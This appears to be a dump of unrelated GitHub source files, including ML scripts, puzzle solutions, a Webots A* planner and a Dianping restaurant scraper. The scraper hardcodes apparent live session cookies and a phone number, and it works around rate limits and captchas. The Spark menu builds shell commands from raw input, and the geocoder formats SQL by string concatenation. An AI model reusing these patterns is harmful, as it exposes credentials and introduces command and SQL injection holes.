plt.savefig(loss_fig_name)\n","repo_name":"Akshat4112/Interpreting-Bidirectional-CRF-LSTM-for-Disease-Entity-Recognition","sub_path":"code/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"663061113","text":"import csv\nimport geocoder\nimport sqlite3\n\n#Gets API keys\ndef get_keys():\n '''Returns a dictionary of API keys from the keys.csv file'''\n\n with open(\"keys.csv\", 'r') as f:\n csv_r = csv.reader(f)\n key_d = {r[0]:r[1] for r in csv_r}\n\n return key_d\n\n#Updates location table with place names\ndef rev_geocode_locs(db='Session_db.db'):\n '''Takes 1 argument - db - path to sqlite db.\n Updates the Location table with reverse geocoded location names using MapQuest API'''\n\n k = get_keys()['MapQuest']\n con = sqlite3.connect(db)\n cur = con.cursor()\n get_locs_sql = \"SELECT id, Lat, Lon FROM Location\"\n pop_locs_sql = '''UPDATE Location SET Name = \"{s}, {c}, {p}\" WHERE id = {i}'''\n cur.execute(get_locs_sql)\n co_ords = cur.fetchall()\n\n for c in co_ords:\n g = geocoder.mapquest([c[1], c[2]], method='reverse', key=k)\n geo = g.json\n street = 'unid' if 'street' not in geo else geo['street']\n city = 'unid' if 'city' not in geo else geo['city']\n postcode = 'unid' if 'postcode' not in geo else geo['postcode']\n cur.execute(pop_locs_sql.format(s=street, c=city, p=postcode, i=c[0]))\n\n cur.close()\n con.commit()\n 
con.close()\n","repo_name":"hedgelawn6/bike_gps","sub_path":"geo_db.py","file_name":"geo_db.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"34845203237","text":"class Solution:\n def matrixReshape(self, nums: List[List[int]], r: int, c: int) -> List[List[int]]:\n if not nums:\n return []\n H = len(nums)\n L = len(nums[0])\n if H*L != r*c:\n return nums\n ans = []\n for i in range(r):\n rowi = []\n for j in range(c):\n rowi.append(nums[(i*c+j)//L][(i*c+j)%L])\n ans.append(rowi)\n return ans\n ","repo_name":"jianq1994/leetcode","sub_path":"python/566_reshape_the_matrix.py","file_name":"566_reshape_the_matrix.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"70934928377","text":"#!/usr/bin/python\n\nimport pyfiglet\nimport os\n \ntitle = pyfiglet.figlet_format(\"Movie Recommendator\")\nmenu_options = {\n 0: 'Download Datasets (Essential)',\n 1: 'Movies for adults or children',\n 2: 'Best rated movies by year',\n 3: 'Best runtime',\n 4: 'Ratings per IMDb type',\n 5: 'Best movies from a given genre',\n 6: 'Best movies from a given title',\n 7: 'Is it worth to watch this movie?',\n 8: 'Best movies by year and region',\n 9: 'Exit',\n}\n\nprint(title)\ndef print_menu():\n for key in menu_options.keys():\n print (key, '--', menu_options[key] )\n\ndef download():\n print('Starting Download...')\n os.system('python download_datasets.py || python3 download_datasets.py')\n\ndef adult_child(master):\n print('You selected \\'Movies for adults or children\\'')\n arg = input('Enter \\'-a\\' for adult or \\'-c\\' for child: ')\n num = input('Enter the number of movies you want to be shown(Optional): ')\n os.system('spark-submit --master ' + master + ' adult_child_movies.py ' + arg + ' ' + num)\n\ndef by_year(master):\n print('You selected \\'Best rated movies by year\\'')\n mode = input('Enter \\'-m\\' for MovieLens results or \\'-i\\' for IMDb results: ')\n year = input('Enter a year: ')\n num = input('Enter the number of movies you want to be shown(Optional): ')\n os.system('spark-submit --master ' + master + ' best_rated_movies_by_year.py ' + mode + ' ' + year + ' ' + num)\n\ndef runtime(master):\n print('You selected \\'Best runtime\\'')\n _show = input('Enter how many you wanna see(Optional): ')\n ratinglvl = input('Enter the rating level(Optional): ')\n minRun = input('Enter the minimum runtime(Optional): ')\n maxRun = input('Enter the maximum runtime(Optional): ')\n arg = input('Enter a command (-avg, -min, -max, -sum) (Optional): ')\n if arg != '': os.system('spark-submit --master ' + master + ' best_runtime.py ' + ratinglvl + ' ' + minRun + ' ' + maxRun + ' ' + arg + ' ' + _show)\n else: os.system('spark-submit --master ' + master + ' best_runtime.py ' + ratinglvl + ' ' + minRun + ' ' + maxRun + ' ' + _show)\n\ndef imdb_type(master):\n print('You selected \\'Ratings per IMDb type\\'')\n type = input('Enter the type(Enter -help or -h for help): ')\n ratinglvl = input('Enter the rating level: ')\n count = input('Enter the number of movies you want to be shown: ')\n os.system('spark-submit --master ' + master + ' getRatingsPerIMDbType.py ' + type + ' ' + ratinglvl + ' ' + count)\n\ndef by_genre(master):\n print('You selected \\'Best movies from a given genre\\'')\n mode = input('Enter \\'-m\\' for MovieLens results or \\'-i\\' for IMDb results: ')\n genre = input('Enter a movie genre: ')\n 
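# num is optional; an empty string is simply appended to the spark-submit command below\n    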
num = input('Enter the number of movies you want to be shown(Optional): ')\n    os.system('spark-submit --master ' + master + ' movies_by_genre.py ' + mode + ' ' + genre + ' ' + num)\n\ndef by_title(master):\n    print('You selected \\'Best movies from a given title\\'')\n    title = input('Enter a movie title: ')\n    os.system('spark-submit --master ' + master + ' movies_by_title.py \\'' + title + '\\'')\n    \ndef is_worth(master):\n    print('You selected \\'Is it worth to watch this movie?\\'')\n    title = input('Enter a movie title: ')\n    os.system('spark-submit --master ' + master + ' worth_movie.py \\'' + title + '\\'')\n    \ndef year_region(master):\n    print('You selected \\'Best movies by year and region\\'')\n    data = input('Enter a year or a language: ')\n    num = input('Enter the number of movies you want to be shown(Optional): ')\n    os.system('spark-submit --master ' + master + ' year_region_recommendations.py \\'' + data + '\\' ' + num)\n\nif __name__=='__main__':\n    \n    master = ''\n    print('The scripts will be submitted to Spark in local mode. In order to submit them in the cloud, please follow the steps described in the README.md file.')\n    \n    while not master:\n        try:\n            inCores = input('Enter the number of cores you want to use to run the application (\\'*\\' for all cores available): ')\n            cores = int(inCores)\n            if cores > 0:\n            \tmaster = 'local[' + str(cores) + ']'\n            \tprint('The scripts will be run locally with ' + str(cores) + ' cores.')\n            else:\n            \tprint('Invalid number. The number of cores must be greater than or equal to 1')\n        except:\n            if not inCores == '*':\n                print('Wrong input. Please enter a number or \\'*\\' ...')\n            else:\n                master = 'local[*]'\n                print('The scripts will be run locally with all the cores available.')\n\n    while(True):\n        print_menu()\n        option = ''\n        try:\n            option = int(input('Enter your choice: '))\n        except:\n            print('Wrong input. Please enter a number ...')\n        #Check what choice was entered and act accordingly\n        if option == 0:\n        \t download()\n        elif option == 1:\n            adult_child(master)\n        elif option == 2:\n            by_year(master)\n        elif option == 3:\n            runtime(master)\n        elif option == 4:\n            imdb_type(master)\n        elif option == 5:\n            by_genre(master)\n        elif option == 6:\n            by_title(master)\n        elif option == 7:\n            is_worth(master)\n        elif option == 8:\n            year_region(master)\n        elif option == 9:\n            print('Thanks for using our recommender')\n            exit()\n            \n        else:\n            print('Invalid option. 
Please enter a number between 0 and 9.')\n","repo_name":"GitWAMH/Cloud_project","sub_path":"scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2510407910","text":"import numpy as np\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('TkAgg')\n# matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.distributions.multivariate_normal import MultivariateNormal\nimport torch.nn as nn\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\nfrom sklearn import datasets as sklearn_datasets\n\n\nWEIGHT_DECAY = 1/100\n\n\ndata_ = sklearn_datasets.make_moons(n_samples=2_000, noise=1/20)[0].astype('float32')\nnorm = nn.BatchNorm1d(num_features=2)\nnormalized_data = norm(torch.tensor(data_))\n# plt.scatter(data[:, 0], data[:, 1], c='r')\n# plt.scatter(normalized_data[:, 0].detach().numpy(), normalized_data[:, 1].detach().numpy(), c='b')\n# plt.show()\n\n\nclass Coupling(nn.Module):\n def __init__(self, input_dim=2):\n super().__init__()\n self.s_layer_1 = nn.Linear(input_dim, 256)\n self.s_layer_2 = nn.Linear(256, 256)\n self.s_layer_3 = nn.Linear(256, 256)\n self.s_layer_4 = nn.Linear(256, 256)\n self.s_layer_5 = nn.Linear(256, input_dim)\n self.t_layer_1 = nn.Linear(input_dim, 256)\n self.t_layer_2 = nn.Linear(256, 256)\n self.t_layer_3 = nn.Linear(256, 256)\n self.t_layer_4 = nn.Linear(256, 256)\n self.t_layer_5 = nn.Linear(256, input_dim)\n\n def forward(self, x):\n s = self.s_layer_1(x)\n s = self.s_layer_2(s)\n s = self.s_layer_3(s)\n s = self.s_layer_4(s)\n s = self.s_layer_5(s)\n t = self.t_layer_1(x)\n t = self.t_layer_2(t)\n t = self.t_layer_3(t)\n t = self.t_layer_4(t)\n t = self.t_layer_5(t)\n return s, t\n\n\ncoupling = Coupling()\n\n\nclass RealNVP(nn.Module):\n def __init__(self, input_dim, n_coupling_layers):\n super().__init__()\n self.standard_gaussian = MultivariateNormal(\n loc=torch.tensor([0. for _ in range(input_dim)]),\n covariance_matrix=torch.diag(torch.tensor([1. for _ in range(input_dim)]))\n )\n # self.masks = torch.tensor(\n # [[0., 1.], [1., 0.]] * (n_coupling_layers // 2)\n # )\n mask_arrays = [[0. 
for _ in range(input_dim)] for _ in range(input_dim)]\n for i in range(input_dim):\n mask_arrays[(input_dim-1) - i][i] = 1.\n self.masks = torch.tensor(\n mask_arrays * (n_coupling_layers // 2)\n )\n # self.coupling_layers = [Coupling(input_dim) for _ in range(n_coupling_layers)]\n self.coupling_layers = nn.ModuleList()\n for _ in range(n_coupling_layers):\n self.coupling_layers.append(Coupling(input_dim))\n\n def forward(self, x, training=False):\n\n log_det_inv = 0\n direction = -1 if training else 1\n output = None\n\n for i in range(len(self.coupling_layers))[::direction]:\n\n reverse_mask = 1 - self.masks[i]\n\n x_masked = x * self.masks[i]\n s, t = self.coupling_layers[i](x_masked)\n s = s * reverse_mask\n t = t * reverse_mask\n\n gate = (direction - 1) / 2 # gate is close (gate=0) if direction=1, i.e., Training=False\n\n output = (\n reverse_mask *\n (x * torch.exp(s * direction)) + (t * direction * torch.exp(s * gate))\n ) + x_masked\n log_det_inv = log_det_inv + (torch.sum(s, dim=-1) * gate)\n\n return output, log_det_inv\n\n def log_loss(self, x):\n output, log_det = self(x, training=True)\n # .log_prob takes ln of the value f(x) where f is the pdf (the actual y value in the distribution)\n log_likelihood = self.standard_gaussian.log_prob(output) + log_det\n return torch.mean(-log_likelihood)\n\n\nreal_nvp = RealNVP(input_dim=2, n_coupling_layers=4)\noptimizer = torch.optim.Adam(params=real_nvp.parameters(), lr=1/100_000, weight_decay=WEIGHT_DECAY)\n\n\ndef fit(model, optim, data, n_epochs=500):\n losses = []\n for ep in range(1, n_epochs+1):\n optim.zero_grad()\n model.train()\n loss = model.log_loss(data)\n loss.backward(retain_graph=True) # need this for iterating through nn.ModuleList()\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0) # gradient clipping\n optim.step()\n losses.append(loss.detach().numpy())\n print('Episode %d | loss: %.4f' % (ep, losses[-1]))\n\n\nfit(real_nvp, optimizer, normalized_data)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Talon1989/generative-ai","sub_path":"TorchRealNVP.py","file_name":"TorchRealNVP.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14944346401","text":"# 2. 
swap-case : https://www.hackerrank.com/challenges/swap-case\ndef swap_case1(input_string):\n    input_string = list(input_string)\n    toggle_string = ''\n    for value in input_string:\n        ascii_value = ord(value)\n        if 65 <= ascii_value <= 90:\n            toggle_string += chr(ascii_value + 32)\n        elif 97 <= ascii_value <= 122:\n            toggle_string += chr(ascii_value - 32)\n        else:\n            toggle_string += value\n    return toggle_string\n\n\ndef swap_case(input_string):\n    return ''.join(value.lower() if value.isupper() else value.upper() for value in input_string)\n\n\nif __name__ == '__main__':\n    s = input()\n    result = swap_case(s)\n    print(result)\n","repo_name":"mahfuz110244/hackerrank","sub_path":"swap_case.py","file_name":"swap_case.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"23105828007","text":"# Merge with attraction picture downloader\n\nimport cv2\nimport glob\n\n# Loop through every image in Attraction Pictures\nfor file in glob.glob(\"Attraction Pictures/*\"):\n\n    # Check to make sure that a file is a jpeg\n    if file.endswith('.jpg'):\n\n        try:\n            # Read image as a matrix of pixels\n            pic = cv2.imread(file)\n\n            # Unpack matrix into multiple lists\n            height, width, color = pic.shape\n\n            # Take half of height and width to find the center of the image\n            mid_height = int(height / 2)\n            mid_width = int(width / 2)\n\n            # Case 1: length and width are both greater than 400 ---> length and width are both cropped to center 400x400 pixels\n            if ((mid_height > 200) and (mid_width > 200)):\n\n                # Constants needed for cropping\n                w = 400\n                h = 400\n                x = mid_width - w / 2\n                y = mid_height - h / 2\n\n                # Cropping picture using list indexing\n                cropped_pic = pic[int(y):int(y + h), int(x):int(x + w)]\n\n                # Write in the cropped image over the old image\n                cv2.imwrite(file, cropped_pic)\n\n                print(\" >400 height by >400 width jpg was cut.\")\n            # Case 2: height is greater than 400, but width is less than or equal to 400 ---> crop height to size of width\n            elif ((mid_height > 200) and (mid_width <= 200)):\n\n                # Constants needed for cropping\n                w = width\n                h = width\n                y = mid_height - h / 2\n\n                # Cropping picture using list indexing\n                cropped_pic = pic[int(y):int(y + h), 0:int(width)]\n\n                # Write in the cropped image over the old image\n                cv2.imwrite(file, cropped_pic)\n\n                print(\" >400 height by <=400 width jpg was cut.\")\n            # Case 3: width is greater than 400, but height is less than or equal to 400 ---> crop width to the size of the height\n            elif ((mid_height <= 200) and (mid_width > 200)):\n\n                # Constants needed for cropping\n                w = height\n                h = height\n                x = mid_width - w / 2\n\n                # Cropping picture using list indexing\n                cropped_pic = pic[0:int(height), int(x):int(x + w)]\n\n                # Write in the cropped image over the old image\n                cv2.imwrite(file, cropped_pic)\n\n                print(\" <=400 height by >400 width jpg was cut.\")\n            # Case 4: both width and height are less than/equal to 400 ---> crop height or width to the size of the smaller one\n            elif ((mid_height <= 200) and (mid_width <= 200)):\n\n                # Case 4A: width is smaller than height\n                if width < height:\n\n                    # Constants needed for cropping\n                    w = width\n                    h = width\n                    y = mid_height - h / 2\n\n                    # Cropping picture using list indexing\n                    cropped_pic = pic[int(y):int(y + h), 0:int(width)]\n\n                    # Write in the cropped image over the old image\n                    cv2.imwrite(file, cropped_pic)\n\n                    print(\"<400 height by <400 width jpg was cut.\")\n                # Case 4B: height is smaller than width\n                elif height < width:\n\n                    # Constants needed for 
cropping\n                    w = height\n                    h = height\n                    x = mid_width - w / 2\n\n                    # Cropping picture using list indexing\n                    cropped_pic = pic[0:int(height), int(x):int(x + w)]\n\n                    # Write in the cropped image over the old image\n                    cv2.imwrite(file, cropped_pic)\n\n                    print(\"<400 height by <400 width jpg was cut.\")\n                # jpeg is already a square of the appropriate size and does not need to be cut more\n                else:\n\n                    print(\"jpg is already a square that is 400 by 400 or smaller\")\n            # jpeg was not cut for some reason and needs to be cut manually\n        except:\n\n            print(\"PROBLEM: UNABLE TO CUT JPEG!!!\", file)\n    # image is not a jpeg and, thus, can not be cut\n    else:\n\n        print(\"UNABLE TO CUT FILE\", file, \"because it is not a jpg\")","repo_name":"DeerEdge/Traveler-Discover-Your-Next-Destination","sub_path":"Attraction Data Scraping Programs/image_cropper.py","file_name":"image_cropper.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"}
+{"seq_id":"42725886299","text":"N, t = list(map(int, input().split()))\narr = list(map(int, input().split()))\n\nif t == 1:\n\tflag = 1\n\ts = set(arr)\n\tfor i in arr:\n\t\tif 7777-i in s:\n\t\t\tprint(\"Yes\")\n\t\t\tflag = 0\n\t\t\tbreak\n\tif flag:\n\t\tprint(\"No\")\n\nelif t == 2:\n\ts = set(arr)\n\tif len(s) < N:\n\t\tprint(\"Contains duplicate\")\n\telse:\n\t\tprint(\"Unique\")\nelif t == 3:\n\tflag = 1\n\td = dict()\n\tfor i in arr:\n\t\tif i not in d:\n\t\t\td[i] = 1\n\t\telse:\n\t\t\td[i] += 1\n\tfor key, value in d.items():\n\t\tif value > N/2:\n\t\t\tprint(key)\n\t\t\tflag = 0\n\t\t\tbreak\n\tif flag:\n\t\tprint(-1)\nelif t == 4:\n\tl = sorted(arr)\n\tif N % 2 == 1:\n\t\tprint(l[N//2])\n\telse:\n\t\tprint(str(l[N//2-1])+\" \"+str(l[N//2]))\nelif t == 5:\n\tl = sorted(arr)\n\tll = list()\n\tfor i in l:\n\t\tif i >= 100 and i <= 999:\n\t\t\tll.append(str(i))\n\tprint(\" \".join(ll))","repo_name":"Weiguo-Jiang/Kattis-Solutions","sub_path":"basicprogramming2.py","file_name":"basicprogramming2.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"24562255878","text":"\"\"\"AstarPlanner controller.\"\"\"\n\nfrom controller import Robot, Supervisor, Node\nimport math\nimport matplotlib.pyplot as plt\nimport numpy \n\n\n# create the Robot instance.\nrobot = Supervisor()\n\n# get the time step of the current world.\ntimestep = int(robot.getBasicTimeStep())\n\nleft_motor = robot.getDevice('left wheel motor')\nright_motor = robot.getDevice('right wheel motor')\nright_motor.setPosition(float('inf'))\nright_motor.setVelocity(0.0)\nleft_motor.setPosition(float('inf'))\nleft_motor.setVelocity(0.0) \nimu = robot.getDevice('inertial unit')\nimu.enable(timestep)\n\npos = robot.getFromDef(\"get_pos\")\ntrans_field = pos.getField(\"translation\")\n\nradius = 0.066\ndistance_between_wheels = 0.16\nvelocity = 2\nx_pos = []\nz_pos = []\n\nclass AstarPlanner:\n    \n    def get_path(self, grid, init, goal, cost, delta, delta_name, heuristic):\n        closed = [[0 for col in range(len(grid[0]))] for row in range(len(grid))]\n        expand = [[-1 for col in range(len(grid[0]))] for row in range(len(grid))]\n        action = [[-1 for col in range(len(grid[0]))] for row in range(len(grid))]\n        plan = []\n        closed[init[0]][init[1]] = 1\n        x = init[0]\n        y = init[1]\n        g = 0\n        h = heuristic[x][y]\n        f = g + h\n        \n        open = [[f, g, x, y]]\n        found = False\n        resign = False\n        count = 0\n        \n        while found is False and resign is False:\n            if (len(open) == 
0):\n resign = True\n print(\"No valid path from Start to Goal !\")\n \n else:\n open.sort()\n open.reverse()\n next = open.pop()\n g = next[1]\n x = next[2]\n y = next[3]\n expand[x][y] = count\n count += 1\n \n if x == goal[0] and y == goal[1]:\n found = True\n print(\"No. of search: \", g)\n \n else:\n for i in range(len(delta)):\n x2 = x + delta[i][0]\n y2 = y + delta[i][1]\n \n if x2 >= 0 and x2 < len(grid) and y2 >=0 and y2 < len(grid[0]):\n if closed[x2][y2] == 0 and grid[x2][y2] == 0:\n g2 = g + cost\n h2 = heuristic[x2][y2]\n f2 = g2 + h2\n open.append([f2, g2, x2, y2])\n closed[x2][y2] = 1\n action[x2][y2] = i\n \n \n path = [[' ' for col in range(len(grid[0]))] for row in range(len(grid))]\n x_ = goal[0]\n y_ = goal[1]\n path[x_][y_] = '*'\n while x_ != init[0] or y_ != init[1]:\n x2_ = x_ - delta[action[x_][y_]][0]\n y2_ = y_ - delta[action[x_][y_]][1] \n path[x2_][y2_] = delta_name[action[x_][y_]]\n plan.append(delta_name[action[x_][y_]])\n x_ = x2_\n y_ = y2_\n \n print(\"expand List\")\n for i in range(len(expand)):\n print(expand[i]) \n \n print(\"----------- PATH ------------\")\n for i in range(len(path)):\n print(path[i])\n \n print(\"----------- PLAN ------------\")\n plan.reverse() \n plan.append('*')\n print(plan)\n \n return path, plan\n \n def getYaw(self):\n imuValues = imu.getRollPitchYaw()\n imuValues = math.degrees(imuValues[2])\n return abs(imuValues) if imuValues < 0 else 360 - imuValues\n \n def diff(self,inp, set):\n tmp = abs(inp - set);\n diff = min(tmp, abs(360- tmp));\n if ((set + diff) != inp and (set - diff) != inp):\n if ((inp + diff) >= 360):\n return -diff;\n else:\n return diff;\n return (inp - set)\n \n def rot90_r(self):\n \n while robot.step(timestep) != -1:\n current = self.getYaw()\n right_motor.setVelocity(2)\n left_motor.setVelocity(-2)\n \n while abs(self.diff(current, self.getYaw())) < 90:\n robot.step(timestep)\n break;\n \n def rot90_l(self):\n while robot.step(timestep) != -1:\n current = self.getYaw()\n right_motor.setVelocity(-2)\n left_motor.setVelocity(2)\n while abs(self.diff(current, self.getYaw())) < 90:\n robot.step(timestep)\n break;\n \n def move(self, last, now):\n store = ''\n if now == '*':\n store = 'stop'\n #print(\"stop\")\n right_motor.setVelocity(0.0)\n left_motor.setVelocity(0.0)\n elif last == now:\n pass\n elif ((last=='^' and now=='>') or (last=='>' and now=='v') or (last=='v' and now=='<') or (last=='<' and now=='^')):\n #print(\"right\")\n self.rot90_l()\n else:\n #print(\"left\")\n self.rot90_r()\n if store != 'stop': \n velo = 0.165\n move_duration = 0.5/velo\n start_time = robot.getTime()\n #print(start_time)\n current_time = robot.getTime()\n right_motor.setVelocity(5.0)\n left_motor.setVelocity(5.0)\n #print(\"straight\")\n while robot.step(timestep) != -1:\n if(current_time - start_time > move_duration):\n values = trans_field.getSFVec3f()\n x_pos.append(values[0])\n z_pos.append(values[2])\n break\n current_time = robot.getTime()\n \n # x_pos.append(values[0])\n # z_pos.append(values[2])\n \n \n right_motor.setVelocity(0.0)\n left_motor.setVelocity(0.0)\n \n def follow_path(self, path, plan):\n \n dummy = 'v'\n for i in range(len(plan)):\n if i==0:\n self.move(dummy, plan[i])\n \n else:\n self.move(plan[i-1], plan[i])\n\n\n\nif __name__ == \"__main__\":\n \n grid = [[0, 1, 1, 0, 0, 1, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 1, 0, 0, 0, 0],\n [0, 1, 1, 1, 0, 1, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 1, 0, 0, 1, 0],\n [0, 1, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 0, 1, 0, 0, 0],\n [0, 1, 
0, 0, 0, 0, 1, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0, 0, 0]]\n \n\n \n heuristic = [[18, 17, 16, 15, 14, 13, 12, 11, 10, 9],\n [17, 16, 15, 14, 13, 12, 11, 10, 9, 8],\n [16, 15, 14, 13, 12, 11, 10, 9, 8, 7],\n [15, 14, 13, 12, 11, 10, 9, 8, 7, 6],\n [14, 13, 12, 11, 10, 9, 8, 7, 6, 5],\n [13, 12, 11, 10, 9, 8, 7, 6, 5, 4],\n [12, 11, 10, 9, 8, 7, 6, 5, 4, 3],\n [11, 10, 9, 8, 7, 6, 5, 4, 3, 2],\n [10, 9, 8, 7, 6, 5, 4, 3, 2, 1],\n [9, 8, 7, 6, 5, 4, 3, 2, 1, 0]]\n \n init = [0, 0]\n goal = [len(grid)-1, len(grid[0])-1]\n cost = 1\n delta = [[-1, 0], # go up\n [0, -1], # go left\n [1, 0], # go down\n [0, 1]] # go right\n \n delta_name = ['^', '<', 'v', '>']\n Robot1 = AstarPlanner()\n path, plan = Robot1.get_path(grid, init, goal, cost, delta, delta_name, heuristic)\n Robot1.follow_path(path, plan)\n \n t_waypoints = []\n f_waypoints = []\n pos = [-2.25, -2.25]\n t_waypoints.append(pos)\n for i in range(1, len(plan)):\n #t_waypoints.append(pos)\n if plan[i-1] == 'v':\n pos = [pos[0], pos[1]+0.5]\n elif plan[i-1] == '>':\n pos = [pos[0]+0.5, pos[1]]\n elif plan[i-1] == '<':\n pos = [pos[0] - 0.5, pos[1]]\n elif plan[i-1] == '^':\n pos = [pos[0], pos[1]-0.5]\n t_waypoints.append(pos)\n print(\"------ temporary waypoints -----\")\n print(t_waypoints) \n \n pos = [-2.25, -2.25]\n f_waypoints.append(pos)\n for i in range(1, len(plan)):\n if i == len(plan)-1:\n f_waypoints.append(t_waypoints[i])\n break\n elif plan[i] != plan[i-1]:\n f_waypoints.append(t_waypoints[i-1])\n f_waypoints.append(t_waypoints[i+1])\n \n \n print(\"------ final waypoints -----\")\n print(f_waypoints)\n \n z_pos_neg = [ -x for x in z_pos]\n fig = plt.figure()\n fig.suptitle('X - Z position', fontsize=16)\n ax = fig.add_subplot(1, 1, 1)\n ax.spines['left'].set_position('center')\n ax.spines['bottom'].set_position('center')\n\n# Eliminate upper and right axes\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n\n# Show ticks in the left and lower axes only\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n \n plt.plot(x_pos, z_pos_neg)\n plt.xlabel(\"X axis\")\n plt.ylabel(\"Z axis\")\n #plt.plot(x_pos, z_pos, 'o', color='red')\n plt.show()\n\n","repo_name":"DhruvPatel30/A-Star-Path-Planning-and-Trajectory-Smoothing","sub_path":"controllers/AstarPlanner/AstarPlanner.py","file_name":"AstarPlanner.py","file_ext":"py","file_size_in_byte":9275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"34655520545","text":"import re\nimport csv\nimport time\nimport random\nimport requests\nfrom pyquery import PyQuery as pq\nfrom multiprocessing.dummy import Pool\n\nurl_base = 'http://www.dianping.com/shop/'\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36',\n 'Cookie': '__mta=245634619.1536160252045.1536160252045.1536160434810.2; _lxsdk_cuid=165a29c7ba4c8-07e63548b75855-9393265-144000-165a29c7ba4c8; _lxsdk=165a29c7ba4c8-07e63548b75855-9393265-144000-165a29c7ba4c8; _hc.v=3f9d95cf-359d-bf59-9ad8-192316f743e0.1536031489; s_ViewType=10; ctu=bb1ea26276669ed59b2b94fee9d8141b73a5ae7e95a2b1558b34fbda8553c6b9; uamo=18629646293; cityInfo=%7B%22cityId%22%3A2%2C%22cityEnName%22%3A%22beijing%22%2C%22cityName%22%3A%22%E5%8C%97%E4%BA%AC%22%7D; selectLevel=%7B%22level1%22%3A%221%22%2C%22level2%22%3A%220%22%7D; ua=18629646293; cy=4; cye=guangzhou; _lx_utm=utm_source%3DBaidu%26utm_medium%3Dorganic; 
lgtoken=0b13378a2-63a0-43a5-aad9-c831d472bc22; dper=e62e27e62b5dd9a8142bfc051f5352a4425deef47718350c76db17b90bdcea8948263b3dc2457e5ce265fe66c25d64f356973ec4a3bd6cc61edd3abe174703a9afa628bf2bb943483184601be860e667c390eecf33f40bbf12e512cdf4e504e6; ll=7fd06e815b796be3df069dec7836c3df; _lxsdk_s=165b7d1b07e-73b-81f-e55%7C%7C632'\n}\n# Mapping between the encrypted digit span tags and the digits they represent\nlist_map = ['', str(1), '', '',\n            '',\n            '', '', '', '',\n            '']\nlist_map2 = ['', str(1), '', '',\n             '',\n             '', '', '', '',\n             '']\n\n\n# Request a url and return the page source\ndef get_html(url):\n    try:\n        session = requests.session()\n        response = session.get(url, headers=headers, timeout=8)\n        if response.status_code == 200:\n            return response.text\n        else:\n            print('Failed to fetch the page source, error status code:', response.status_code)\n    except Exception as e:\n        print(e)\n        print('Failed to get the page source for the current url!')\n        time.sleep(2 + float(random.randint(1, 400)) / 200)\n        return None\n\n\ndef get_detail_html(url):\n    try:\n        session = requests.session()\n        response = session.get(url, headers=headers, timeout=8)\n        # time.sleep(float(random.randint(1, 1000))/1000)\n        if response.status_code == 200:\n            return response.text\n        else:\n            print('Failed to fetch the shop detail page source, error status code:', response.status_code)\n            if response.status_code == 403:\n                time.sleep(12)\n            return None\n    except Exception as e:\n        print(e)\n        print('Failed to get the shop detail page source!')\n        time.sleep(2 + float(random.randint(1, 400)) / 200)\n        return None\n\n\ndef get_index_html(url):\n    try:\n        session = requests.session()\n        response = session.get(url, headers=headers, timeout=8)\n        if response.status_code == 200:\n            return response.text\n        else:\n            print('Failed to fetch the index page source, error status code:', response.status_code)\n    except Exception as e:\n        print(e)\n        print('Failed to get the index page source!')\n        time.sleep(2 + float(random.randint(1, 400)) / 200)\n        return None\n\n\n# Get the number of pages under the current category\ndef get_page_num(html):\n    try:\n        doc = pq(html)\n        items = doc('.page a').items()\n        page_num = []\n        for item in items:\n            page_num.append(item.text())\n        if len(page_num) > 0:\n            page = int(page_num[-2])\n            return page\n        else:\n            print('This category probably has only one page... or there is a letter captcha! Open the page to check - if there is a captcha you have 24 seconds to enter it!')\n            time.sleep(24 + float(random.randint(1, 800)) / 200)\n            return int(1)\n    except Exception as e:\n        print('\\n', e)\n        time.sleep(2 + float(random.randint(1, 400)) / 200)\n        return None\n\n\n# Get all category urls under the current city's navigation\ndef get_index_urls(html):\n    try:\n        doc = pq(html)\n        items = doc('#classfy a').items()\n        for item in items:\n            url = item.attr['href']\n            html = get_html(url)\n            doc = pq(html)\n            sub = doc('#classfy-sub a')\n            if not str(sub):  # if there are no sub-categories, yield the main category url\n                yield url\n            else:  # if there are sub-categories, yield each sub-category url in turn\n                items_sub = sub.items()\n                for item_sub in items_sub:\n                    uri = item_sub.attr['href']\n                    if uri == url:  # the first sub-category url is identical to the main category url; skip the duplicate\n                        continue\n                    yield uri\n    